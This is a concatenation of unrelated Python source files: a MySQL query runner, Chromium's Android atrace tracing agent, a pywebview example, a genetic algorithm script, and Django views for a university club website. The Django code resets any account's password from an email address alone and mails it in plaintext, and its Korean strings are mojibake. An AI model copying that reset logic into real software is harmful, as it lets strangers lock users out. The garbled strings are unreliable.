WHERE col.table_schema NOT IN ('information_schema', 'performance_schema', 'mysql', 'sys');
"""
results, error = self.run_query(query, None)
if error is not None:
raise Exception("Failed getting schema.")
results = json_loads(results)
for row in results["rows"]:
if row["table_schema"] != self.configuration["db"]:
table_name = "{}.{}".format(row["table_schema"], row["table_name"])
else:
table_name = row["table_name"]
if table_name not in schema:
schema[table_name] = {"name": table_name, "columns": []}
schema[table_name]["columns"].append(row["column_name"])
return list(schema.values())
def run_query(self, query, user):
ev = threading.Event()
thread_id = ""
r = Result()
t = None
try:
connection = self._connection()
thread_id = connection.thread_id()
t = threading.Thread(
target=self._run_query, args=(query, user, connection, r, ev)
)
t.start()
while not ev.wait(1):
pass
except JobTimeoutException as e:
self._cancel(thread_id)
t.join()
raise e
except (KeyboardInterrupt, InterruptException):
error = self._cancel(thread_id)
t.join()
r.json_data = None
r.error = "Query cancelled by user."
if error is not None:
r.error = error
return r.json_data, r.error
def _run_query(self, query, user, connection, r, ev):
try:
cursor = connection.cursor()
logger.debug("MySQL running query: %s", query)
cursor.execute(query)
data = cursor.fetchall()
desc = cursor.description
while cursor.nextset():
if cursor.description is not None:
data = cursor.fetchall()
desc = cursor.description
# TODO - very similar to pg.py
if desc is not None:
columns = self.fetch_columns(
[(i[0], types_map.get(i[1], None)) for i in desc]
)
rows = [
dict(zip((column["name"] for column in columns), row))
for row in data
]
data = {"columns": columns, "rows": rows}
r.json_data = json_dumps(data)
r.error = None
else:
r.json_data = None
r.error = "No data was returned."
cursor.close()
except MySQLdb.Error as e:
if cursor:
cursor.close()
r.json_data = None
r.error = e.args[1]
finally:
ev.set()
if connection:
connection.close()
def _get_ssl_parameters(self):
if not self.configuration.get("use_ssl"):
return None
ssl_params = {}
if self.configuration.get("use_ssl"):
config_map = {"ssl_cacert": "ca", "ssl_cert": "cert", "ssl_key": "key"}
for key, cfg in config_map.items():
val = self.configuration.get(key)
if val:
ssl_params[cfg] = val
return ssl_params
def _cancel(self, thread_id):
connection = None
cursor = None
error = None
try:
connection = self._connection()
cursor = connection.cursor()
query = "KILL %d" % (thread_id)
logging.debug(query)
cursor.execute(query)
except MySQLdb.Error as e:
if cursor:
cursor.close()
error = e.args[1]
finally:
if connection:
connection.close()
return error
class RDSMySQL(Mysql):
@classmethod
def name(cls):
return "MySQL (Amazon RDS)"
@classmethod
def type(cls):
return "rds_mysql"
@classmethod
def configuration_schema(cls):
return {
"type": "object",
"properties": {
"host": {"type": "string"},
"user": {"type": "string"},
"passwd": {"type": "string", "title": "Password"},
"db": {"type": "string", "title": "Database name"},
"port": {"type": "number", "default": 3306},
"use_ssl": {"type": "boolean", "title": "Use SSL"},
},
"order": ["host", "port", "user", "passwd", "db"],
"required": ["db", "user", "passwd", "host"],
"secret": ["passwd"],
}
def _get_ssl_parameters(self):
if self.configuration.get("use_ssl"):
ca_path = os.path.join(
os.path.dirname(__file__), "./files/rds-combined-ca-bundle.pem"
)
return {"ca": ca_path}
return None
register(Mysql)
register(RDSMySQL)
|
atrace_agent.py
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import optparse
import platform
import re
import sys
import threading
import zlib
import py_utils
from devil.android import device_utils
from devil.android.sdk import version_codes
from py_trace_event import trace_time as trace_time_module
from systrace import trace_result
from systrace import tracing_agents
from systrace import util
# Text that ADB sends, but does not need to be displayed to the user.
ADB_IGNORE_REGEXP = r'^capturing trace\.\.\. done|^capturing trace\.\.\.'
# The number of seconds to wait on output from ADB.
ADB_STDOUT_READ_TIMEOUT = 0.2
# The number of seconds to wait for large output from ADB.
ADB_LARGE_OUTPUT_TIMEOUT = 600
# The adb shell command to initiate a trace.
ATRACE_BASE_ARGS = ['atrace']
# If a custom list of categories is not specified, traces will include
# these categories (if available on the device).
DEFAULT_CATEGORIES = 'am,binder_driver,camera,dalvik,freq,'\
'gfx,hal,idle,input,memory,memreclaim,'\
'res,sched,sync,view,webview,wm,workq'
# The command to list trace categories.
LIST_CATEGORIES_ARGS = ATRACE_BASE_ARGS + ['--list_categories']
# Minimum number of seconds between displaying status updates.
MIN_TIME_BETWEEN_STATUS_UPDATES = 0.2
# ADB sends this text to indicate the beginning of the trace data.
TRACE_START_REGEXP = r'TRACE\:'
# Plain-text trace data should always start with this string.
TRACE_TEXT_HEADER = '# tracer'
_FIX_MISSING_TGIDS = True
_FIX_CIRCULAR_TRACES = True
def list_categories(config):
"""List the possible trace event categories.
This function needs the tracing config since it needs to get the serial
number of the device to send a command to.
Args:
config: Tracing config.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if not re.match(r'^\s*rs\s*-', c)]
print '\n'.join(categories)
if not devutils.HasRoot():
print '\nNOTE: more categories may be available with adb root\n'
def get_available_categories(config, device_sdk_version):
"""Gets the list of atrace categories available for tracing.
Args:
config: Tracing config.
device_sdk_version: Sdk version int of device to be queried.
"""
devutils = device_utils.DeviceUtils(config.device_serial_number)
categories_output = devutils.RunShellCommand(
LIST_CATEGORIES_ARGS, check_return=True)
categories = [c.split('-')[0].strip() for c in categories_output]
if device_sdk_version < version_codes.MARSHMALLOW:
# work around platform bug where rs tag would corrupt trace until M(Api23)
categories = [c for c in categories if c != 'rs']
return categories
def try_create_agent(config):
"""Create an Atrace agent.
Args:
config: Command line config.
"""
if config.target != 'android':
return None
if config.from_file is not None:
return None
if not config.atrace_categories:
return None
# Check device SDK version.
device_sdk_version = util.get_device_sdk_version()
if device_sdk_version < version_codes.JELLY_BEAN_MR2:
print ('Device SDK versions < 18 (Jellybean MR2) not supported.\n'
'Your device SDK version is %d.' % device_sdk_version)
return None
return AtraceAgent(device_sdk_version, util.get_tracing_path())
def _construct_extra_atrace_args(config, categories):
"""Construct extra arguments (-a, -k, categories) for atrace command.
Args:
config: Tracing config.
"""
extra_args = []
if config.app_name is not None:
extra_args.extend(['-a', config.app_name])
if config.kfuncs is not None:
extra_args.extend(['-k', config.kfuncs])
extra_args.extend(categories)
return extra_args
def _construct_atrace_args(config, categories):
"""Builds the command used to invoke a trace process.
Returns:
A tuple where the first element is an array of command arguments, and
the second element is a boolean which will be true if the command will
stream trace data.
"""
atrace_args = ATRACE_BASE_ARGS[:]
if config.compress_trace_data:
atrace_args.extend(['-z'])
if (config.trace_time is not None) and (config.trace_time > 0):
atrace_args.extend(['-t', str(config.trace_time)])
if (config.trace_buf_size is not None) and (config.trace_buf_size > 0):
atrace_args.extend(['-b', str(config.trace_buf_size)])
elif 'webview' in categories and 'sched' in categories:
# https://crbug.com/814330: webview_startup sometimes exceeds the buffer
# limit, so doubling this.
atrace_args.extend(['-b', '8192'])
elif 'sched' in categories:
# 'sched' is a high-volume tag, double the default buffer size
# to accommodate that
atrace_args.extend(['-b', '4096'])
extra_args = _construct_extra_atrace_args(config, categories)
atrace_args.extend(extra_args)
return atrace_args
class AtraceAgent(tracing_agents.TracingAgent):
def __init__(self, device_sdk_version, tracing_path):
super(AtraceAgent, self).__init__()
self._device_sdk_version = device_sdk_version
self._tracing_path = tracing_path
self._adb = None
self._trace_data = None
self._tracer_args = None
self._collection_thread = None
self._device_utils = None
self._device_serial_number = None
self._config = None
self._categories = None
def __repr__(self):
return 'atrace'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
assert config.atrace_categories, 'Atrace categories are missing!'
self._config = config
self._categories = config.atrace_categories
if isinstance(self._categories, list):
self._categories = ','.join(self._categories)
avail_cats = get_available_categories(config, self._device_sdk_version)
unavailable = [x for x in self._categories.split(',') if
x not in avail_cats]
self._categories = [x for x in self._categories.split(',') if
x in avail_cats]
if unavailable:
print 'These categories are unavailable: ' + ' '.join(unavailable)
self._device_utils = device_utils.DeviceUtils(config.device_serial_number)
self._device_serial_number = config.device_serial_number
self._tracer_args = _construct_atrace_args(config,
self._categories)
self._device_utils.RunShellCommand(
self._tracer_args + ['--async_start'], check_return=True)
return True
def _collect_and_preprocess(self):
"""Collects and preprocesses trace data.
Stores results in self._trace_data.
"""
trace_data = self._collect_trace_data()
self._trace_data = self._preprocess_trace_data(trace_data)
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
"""Stops tracing and starts collecting results.
To synchronously retrieve the results after calling this function,
call GetResults().
"""
self._collection_thread = threading.Thread(
target=self._collect_and_preprocess)
self._collection_thread.start()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
"""Waits for collection thread to finish and returns trace results."""
self._collection_thread.join()
self._collection_thread = None
return trace_result.TraceResult('systemTraceEvents', self._trace_data)
def SupportsExplicitClockSync(self):
return True
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
"""Records a clock sync marker.
Args:
sync_id: ID string for clock sync marker.
"""
cmd = 'echo trace_event_clock_sync: name=%s >' \
' %s/trace_marker' % (sync_id, self._tracing_path)
with self._device_utils.adb.PersistentShell(
self._device_serial_number) as shell:
t1 = trace_time_module.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _stop_collect_trace(self):
"""Stops atrace.
Note that prior to Api 23, --async-stop isn't working correctly. It
doesn't stop tracing and clears trace buffer before dumping it rendering
results unusable."""
if self._device_sdk_version < version_codes.MARSHMALLOW:
is_trace_enabled_file = '%s/tracing_on' % self._tracing_path
# Stop tracing first so new data won't arrive while dump is performed (it
# may take a non-trivial time and tracing buffer may overflow).
self._device_utils.WriteFile(is_trace_enabled_file, '0')
result = self._device_utils.RunShellCommand(
self._tracer_args + ['--async_dump'], raw_output=True,
large_output=True, check_return=True,
timeout=ADB_LARGE_OUTPUT_TIMEOUT)
# Run synchronous tracing for 0 seconds to stop tracing, clear buffers
# and other state.
self._device_utils.RunShellCommand(
self._tracer_args + ['-t 0'], check_return=True)
else:
# On M+ --async_stop does everything necessary
result = self._device_utils.RunShellCommand(
self._tracer_args + ['--async_stop'], raw_output=True,
large_output=True, check_return=True,
timeout=ADB_LARGE_OUTPUT_TIMEOUT)
return result
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
result = self._stop_collect_trace()
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if _FIX_MISSING_TGIDS:
# Gather proc data from device and patch tgids
procfs_dump = self._device_utils.RunShellCommand(
'echo -n /proc/[0-9]*/task/[0-9]*',
shell=True, check_return=True)[0].split(' ')
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if _FIX_CIRCULAR_TRACES:
trace_data = fix_circular_traces(trace_data)
return trace_data
def extract_tgids(trace_lines):
"""Removes the procfs dump from the given trace text
Args:
trace_lines: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
for line in trace_lines:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
class AtraceConfig(tracing_agents.TracingConfig):
def __init__(self, atrace_categories, trace_buf_size, kfuncs,
app_name, compress_trace_data, from_file,
device_serial_number, trace_time, target):
tracing_agents.TracingConfig.__init__(self)
self.atrace_categories = atrace_categories
self.trace_buf_size = trace_buf_size
self.kfuncs = kfuncs
self.app_name = app_name
# Trace compression is broken on Windows.
# TODO: Fix https://crbug.com/739751.
self.compress_trace_data = \
compress_trace_data and platform.system() != 'Windows'
self.from_file = from_file
self.device_serial_number = device_serial_number
self.trace_time = trace_time
self.target = target
def add_options(parser):
options = optparse.OptionGroup(parser, 'Atrace options')
options.add_option('--atrace-categories', dest='atrace_categories',
help='Select atrace categories with a comma-delimited '
'list, e.g. --atrace-categories=cat1,cat2,cat3')
options.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
options.add_option('--no-compress', dest='compress_trace_data',
default=True, action='store_false',
help='Tell the device not to send the trace data in '
'compressed form.')
options.add_option('-a', '--app', dest='app_name', default=None,
type='string', action='store',
help='enable application-level tracing for '
'comma-separated list of app cmdlines')
options.add_option('--from-file', dest='from_file',
action='store', help='read the trace from a '
'file (compressed) rather than running a '
'live trace')
return options
def get_config(options):
return AtraceConfig(options.atrace_categories,
options.trace_buf_size, options.kfuncs,
options.app_name, options.compress_trace_data,
options.from_file, options.device_serial_number,
options.trace_time, options.target)
|
destroy_window.py
|
import webview
import threading
import time
"""
This example demonstrates how a webview window is created and destroyed
programmatically after 5 seconds.
"""
def destroy():
# show the window for a few seconds before destroying it:
time.sleep(5)
print("Destroying window..")
webview.destroy_window()
print("Destroyed!")
if __name__ == '__main__':
t = threading.Thread(target=destroy)
t.start()
webview.create_window("Destroy Window Example", "https://pywebview.flowrl.com/hello")
print("Window is destroyed")
|
genetic_algorithm.py
|
import multiprocessing as mp
import threading
import queue
import numpy as np
import nn
# taken from:
# https://machinelearningmastery.com/simple-genetic-algorithm-from-scratch-in-python/
import new_main
# genetic algorithm search for continuous function optimization
from numpy.random import randint
from numpy.random import rand
# objective function
def objective(x):
return x[0] ** 2.0 + x[1] ** 2.0
# decode bitstring to numbers
def decode(bounds, n_bits, bitstring):
decoded = list()
largest = 2 ** n_bits
for i in range(len(bounds)):
# extract the substring
start, end = i * n_bits, (i * n_bits) + n_bits
substring = bitstring[start:end]
# convert bitstring to a string of chars
chars = ''.join([str(s) for s in substring])
# convert string to integer
integer = int(chars, 2)
# scale integer to desired range
value = bounds[i][0] + (integer / largest) * (bounds[i][1] - bounds[i][0])
# store
decoded.append(value)
return decoded
# tournament selection
def selection(pop, scores, k=3):
# first random selection
selection_ix = randint(len(pop))
for ix in randint(0, len(pop), k - 1):
# check if better (e.g. perform a tournament)
if scores[ix] < scores[selection_ix]:
selection_ix = ix
return pop[selection_ix]
# crossover two parents to create two children
def crossover(p1, p2, r_cross):
# children are copies of parents by default
c1, c2 = p1.copy(), p2.copy()
# check for recombination
if rand() < r_cross:
# select crossover point that is not on the end of the string
pt = randint(1, len(p1) - 2)
# perform crossover
c1 = p1[:pt] + p2[pt:]
c2 = p2[:pt] + p1[pt:]
return [c1, c2]
# mutation operator
def mutation(bitstring, r_mut):
for i in range(len(bitstring)):
# check for a mutation
if rand() < r_mut:
# flip the bit
bitstring[i] = 1 - bitstring[i]
# genetic algorithm
def genetic_algorithm(objective, bounds, n_bits, n_iter, n_pop, r_cross, r_mut):
# initial population of random bitstring
pop = [randint(0, 2, n_bits * len(bounds)).tolist() for _ in range(n_pop)]
# keep track of best solution
best = 0
best_eval = queue.Queue()
objective(best_eval, decode(bounds, n_bits, pop[0]))
best_eval = best_eval.get()
# enumerate generations
for gen in range(n_iter):
# decode population
decoded = [decode(bounds, n_bits, p) for p in pop]
# evaluate all candidates in the population
# ******
outputQueue = queue.Queue()
thread = threading.Thread(target=simulate_game, args=(outputQueue, decoded))
thread.start()
scores = outputQueue.get()
# ******
# check for new best solution
for i in range(n_pop):
if scores[i] < best_eval:
best, best_eval = pop[i], scores[i]
# print(">%d, new best f(%s) = %f" % (gen, decoded[i], scores[i]))
# select parents
selected = [selection(pop, scores) for _ in range(n_pop)]
# create the next generation
children = list()
for i in range(0, n_pop, 2):
# get selected parents in pairs
p1, p2 = selected[i], selected[i + 1]
# crossover and mutation
for c in crossover(p1, p2, r_cross):
# mutation
mutation(c, r_mut)
# store for next generation
children.append(c)
# replace population
pop = children
# We want a longer game time to train to the expanding path
# for every iteration
new_main.ITERATION_TIME += 0.5
return [best, best_eval]
def simulate_game(outputQueue, decoded):
print("starting game")
scores = []
population = []
for d in decoded:
population.append(new_main.Phenotype(d))
game = new_main.Game(population)
scores = game.get_scores()
outputQueue.put(scores)
print(scores)
print("finished game")
# objective function
def objective(output, weights):
output.put(sum(weights))
# define range for input
bounds = [[-1.0, 1.0]]*nn.num_weights
# define the total iterations
n_iter = 100
# bits per variable
n_bits = 16
# define the population size
n_pop = 20
# crossover rate
r_cross = 0.9
# mutation rate
r_mut = 0.5 / (float(n_bits) * len(bounds))
# perform the genetic algorithm search
best, score = genetic_algorithm(objective, bounds, n_bits, n_iter, n_pop, r_cross, r_mut)
print('Done!')
decoded = decode(bounds, n_bits, best)
print('f(%s) = %f' % (decoded, score))
|
views.py
|
from django.db import IntegrityError
from django.shortcuts import render, redirect
from django.http import HttpResponseRedirect
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.views.generic import View, ListView
from django.contrib.auth.hashers import check_password
from django.contrib import auth
from django.core.mail import EmailMultiAlternatives
import threading
from .models import *
from .forms import *
# Create your views here.
# todo ajax๋ก ๋ก๊ทธ์ธ/๊ฐ์
๋น๋ฐ๋ฒํธ ๋ถ์ผ์น ์ฒ๋ฆฌ
class FaqView(View):
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/faq.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'faq_1': Faq.objects.filter(tag_id=1), 'faq_2': Faq.objects.filter(tag_id=2)})
return render(request, 'www/faq.html', {'reset_password_form': ResetPassword(), 'faq_1': Faq.objects.filter(tag_id=1), 'faq_2': Faq.objects.filter(tag_id=2)})
class Auth(View):
pass
class IndexView(View):
def post(self, request):
typewrite_result = ""
for i in TypeWrite.objects.all():
typewrite_result += "\""
typewrite_result += i.__str__()
typewrite_result += "\","
typewrite_result = typewrite_result[:typewrite_result.__len__() - 1]
return auth_controls(request, typewrite_result)
def get(self, request):
typewrite_result = ""
for i in TypeWrite.objects.all():
typewrite_result += "\""
typewrite_result += i.__str__()
typewrite_result += "\","
typewrite_result = typewrite_result[:typewrite_result.__len__() - 1]
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/index.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result})
return render(request, 'www/index.html', {'reset_password_form': ResetPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result})
class TeamView(View):
def post(self, request):
return auth_controls(request, '')
def get(self, request):
operators = User.objects.filter(is_staff=True, is_superuser=False).select_related('advanceduser').order_by('-date_joined')
# todo ์ฟผ๋ฆฌ ์ต์ ํ
members = User.objects.filter(is_staff=False, is_superuser=False).select_related('advanceduser').order_by('-date_joined')
members = members.raw('SELECT * FROM auth_user JOIN www_member ON auth_user.email = www_member.email')
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/team.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'operators': operators, 'members': members})
return render(request, 'www/team.html', {'reset_password_form': ResetPassword(), 'operators': operators, 'members': members})
class NoticeContentView(View):
def get(self, request, slug):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/notice.html',
{'profile_form': profile_form, 'edit_password_form': EditPassword(), 'posts': Notice.objects.order_by('-created_date'), 'notice': Notice.objects.get(slug=slug)})
return render(request, 'www/notice.html', {'reset_password_form': ResetPassword(), 'posts': Notice.objects.order_by('-created_date'), 'notice': Notice.objects.get(slug=slug)})
class NoticeListView(View):
def post(self, request):
return auth_controls(request, '')
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/notice_list.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'notice': Notice.objects.order_by('-created_date')})
return render(request, 'www/notice_list.html', {'reset_password_form': ResetPassword(), 'notice': Notice.objects.order_by('-created_date')})
class NoticeNewView(View):
def post(self, request):
if request.user.is_authenticated:
try:
form_data = NewPortfolio(request.POST, request.FILES)
# form_data.author = auth.get_user(request).username
if form_data.is_valid():
form_data.save()
# obj = form_data.save(commit=False)
# obj.user = request.user
# obj.save()
return HttpResponseRedirect('/assignment')
else:
raise Exception
except Exception:
return HttpResponseRedirect('/assignment', {'flash_data': '์ ์ถ ๊ณผ์ ์์ ์ค๋ฅ๊ฐ ๋ฐ์ํ์ต๋๋ค.'})
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/portfolio_new.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'notice_form': NewPortfolio()})
return HttpResponseRedirect('/notice')
#
# def post(request, post_url):
# content = Post.objects.get(title=post_url)
# return render(request, 'www/post.html', {'post': content})
class PortfolioView(View):
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/portfolio.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignments': Portfolio.objects.order_by('-datetime_created')})
return render(request, 'www/portfolio.html', {'reset_password_form': ResetPassword(), 'posts': Portfolio.objects.order_by('-datetime_created')})
class AssignmentGetView(View):
def get(self, request, assignment_url):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/assignment.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignment': Portfolio.objects.get(id=assignment_url)})
return render(request, 'www/assignment.html', {'reset_password_form': ResetPassword(), 'posts': Portfolio.objects.order_by('-created_date')})
class AssignmentEditView(View):
def post(self, request, assignment_url):
if request.user.is_authenticated:
try:
form_data = NewPortfolio(request.POST, request.FILES)
# form_data.author = auth.get_user(request).username
if form_data.is_valid():
assignment = Portfolio.objects.get(id=assignment_url)
assignment.title = request.POST['title']
assignment.content = request.POST['content']
assignment.file = request.POST['file']
assignment.save()
return HttpResponseRedirect('/assignment')
else:
raise Exception
except Exception:
return HttpResponseRedirect('/assignment', {'flash_data': '์ ์ถ ๊ณผ์ ์์ ์ค๋ฅ๊ฐ ๋ฐ์ํ์ต๋๋ค.'})
def get(self, request, assignment_url):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
assignment_form = NewPortfolio(instance=Portfolio.objects.get(id=assignment_url))
return render(request, 'www/assignment_new.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignment_form': assignment_form})
return render(request, 'www/assignment_new.html', {'reset_password_form': ResetPassword(), 'posts': Portfolio.objects.order_by('-created_date')})
class AssignmentNewView(View):
def post(self, request):
if request.user.is_authenticated:
try:
form_data = NewPortfolio(request.POST, request.FILES)
# form_data.author = auth.get_user(request).username
if form_data.is_valid():
form_data.save()
# obj = form_data.save(commit=False)
# obj.user = request.user
# obj.save()
return HttpResponseRedirect('/assignment')
else:
raise Exception
except Exception:
return HttpResponseRedirect('/assignment', {'flash_data': '์ ์ถ ๊ณผ์ ์์ ์ค๋ฅ๊ฐ ๋ฐ์ํ์ต๋๋ค.'})
def get(self, request):
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/assignment_new.html', {'profile_form': profile_form, 'edit_password_form': EditPassword(), 'assignment_form': NewPortfolio()})
return HttpResponseRedirect('/assignment')
def portfolio(request):
return render(request, 'www/portfolio.html')
def error404(request):
return render(request, 'www/404.html')
def auth_controls(request, typewrite_result):
if request.POST['submit_type'] == "login":
user = auth.authenticate(request, username=request.POST['username'], password=request.POST['password'])
if user is not None:
if user.is_active:
auth.login(request, user)
return HttpResponseRedirect('/')
else:
return render(request, 'www/index.html', {'maxim': Maxim.objects, 'typewrite': typewrite_result, 'flash_data': 'failedLogin'})
elif request.POST['submit_type'] == "signup":
if request.POST['password'] == request.POST['password-verify']:
try:
if not User.objects.filter(email=request.POST['email']):
user = User.objects.create_user(username=request.POST['username'], email=request.POST['email'], password=request.POST['password'])
advanced_user = AdvancedUser(user_id=user.id)
advanced_user.save()
auth.login(request, user)
else:
raise Exception
except IntegrityError:
flash_data = 'failedSignup'
except Exception:
flash_data = 'failedSignup'
else:
flash_data = 'successSignup'
else:
flash_data = 'notMatchPassword'
if request.user.is_authenticated:
profile_form = EditProfile(instance=AdvancedUser.objects.get(user_id=auth.get_user(request).id))
return render(request, 'www/index.html',
{'profile_form': profile_form, 'edit_password_form': EditPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result, 'flash_data': flash_data})
return render(request, 'www/index.html', {'reset_password_form': ResetPassword(), 'maxim': Maxim.objects, 'typewrite': typewrite_result, 'flash_data': flash_data})
elif request.POST['submit_type'] == "logout":
auth.logout(request)
return HttpResponseRedirect('/')
elif request.POST['submit_type'] == "edit_profile":
try:
instance_user = AdvancedUser.objects.get(user_id=auth.get_user(request).id)
form_data = EditProfile(request.POST, request.FILES, instance=instance_user)
if form_data.is_valid():
obj = form_data.save(commit=False)
obj.user = request.user
obj.save()
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
except AdvancedUser.DoesNotExist:
form_data = EditProfile(request.POST)
if form_data.is_valid():
obj = form_data.save(commit=False)
obj.user = request.user
obj.save()
return HttpResponseRedirect('/')
else:
return HttpResponseRedirect('/')
elif request.POST['submit_type'] == "edit_password":
if check_password(request.POST['current_password'], request.user.password):
if request.POST['password'] == request.POST['password_verify']:
request.user.set_password(request.POST['password'])
request.user.save()
return HttpResponseRedirect('/')
elif request.POST['submit_type'] == "reset_password":
try:
user = User.objects.get(email=request.POST['email'])
password = User.objects.make_random_password(length=12)
user.set_password(password)
user.save()
mailing = EmailThread('KNUT X LIKE LION ์์ ๋น๋ฐ๋ฒํธ ๋ฐ๊ธ', '', 'KNUT X LIKE LION', [request.POST['email']], False,
'<div dir="ltr"><p>KNUT X LIKE LION์ผ๋ก๋ถํฐ ์์ ๋น๋ฐ๋ฒํธ๊ฐ ๋ฐ๊ธ๋์์ต๋๋ค. ๋ก๊ทธ์ธ ํ ๋น๋ฐ๋ฒํธ๋ฅผ ๋ณ๊ฒฝํ์๊ธฐ ๋ฐ๋๋๋ค.</p><p>์์ ๋น๋ฐ๋ฒํธ : ' + password + '</p><div dir="ltr" class="gmail_signature" data-smartmail="gmail_signature"><div dir="ltr"><div><div dir="ltr"><div dir="ltr"><div dir="ltr"><div><b><br></b></div><div><b>HACK YOUR LIFE</b></div><div>๋ฉ์์ด ์ฌ์์ฒ๋ผ at ํ๊ตญ๊ตํต๋ํ๊ต <b>KNUT X LIKE LION</b></div><div><a href="http://knut.likelion.org" target="_blank">http://knut.likelion.org</a></div><div><a href="https://facebook.com/likelionKNUT" target="_blank">https://facebook.com/likelionKNUT</a></div><div><a href="https://likelion.net" target="_blank">https://likelion.net</a></div></div></div></div></div></div></div></div>')
mailing.start()
except User.DoesNotExist:
